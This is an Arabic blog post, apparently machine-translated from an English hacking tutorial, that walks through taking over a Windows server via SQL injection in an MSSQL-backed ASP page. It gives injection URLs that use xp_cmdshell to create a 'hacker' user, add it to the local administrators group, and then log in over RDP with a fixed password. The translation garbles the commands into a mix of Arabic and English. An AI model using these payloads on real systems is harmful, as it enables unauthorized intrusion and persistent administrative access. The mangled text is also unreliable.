Rooting/RDP A Windows Box via MSSQL Injection
تأصيل / RDP ويندوز صندوق عن طريق حقن
| صيل / RDP ويندوز صندوق عن طريق حقن MSSQL |
الخطوة 1.
مقدمة: MSSQL حقن، ويمكن استخدامها للمنتجات التي يتم إنشاؤها من قبل شركة معروفة
Microsoft.Check إذا الامتيازات هي "DBO 'وهو ما يعني مالك قاعدة البيانات (DBO).
مثال:
شبكة الاتصالات العالمية. استهداف كوم / news.asp؟ معرف = 1
- إذا كان يظهر شيء من هذا القبيل يعني 'DBO' هذه الصفحة تمت نقاط الضعف ويمكنك قضاء عليه.
مثال:
www.target.com/news.asp؟ معرف = تحويل (الباحث، (اختيار المستخدم +)) -
الخطوة 2.
إضافة حساب المستخدم:
مثال:
www.target.com/news.asp؟ معرف =؛ master..xp_cmdshell إكسيك "صافي
المستخدم القراصنة / إضافة '؛ -
// هنا uname = القراصنة وباسود = 123456..you يمكن تغييره ...
الخطوة 3.
إضافة إلى المسؤولين المجموعة:
مثال:
master..xp_cmdshell www.target.com/news.asp؟id=؛exec "الإداريين LOCALGROUP
صافي القراصنة / إضافة '؛ -
يمكنك القيام به ... الآن مفتوح المدى، اكتب mstsc وضرب enter..then كتابة الملكية الفكرية من
الشاشة server..Login سيأتي ..
نوع uname = القراصنة
باسود = 123456
حرر !! :)) المدى مفتوح الآن، اكتب mstsc وضرب إدخال !! ثم كتابة IP لملقم !!
سيأتي تسجيل الدخول الشاشة ..
نوع uname = القراصنة
باسود = 123456
Mimou Dz
تسعدنا زيارتك دائما, أتمنى أن تعجبكم المدونة , ويمكنكم زيارة المدونة بسرعة عن طريق جوجل فقط اكتب في مربع البحث ainoussera-programmer.blogspot.com.
هل أعجبك الموضوع ؟
ليست هناك تعليقات:
إرسال تعليق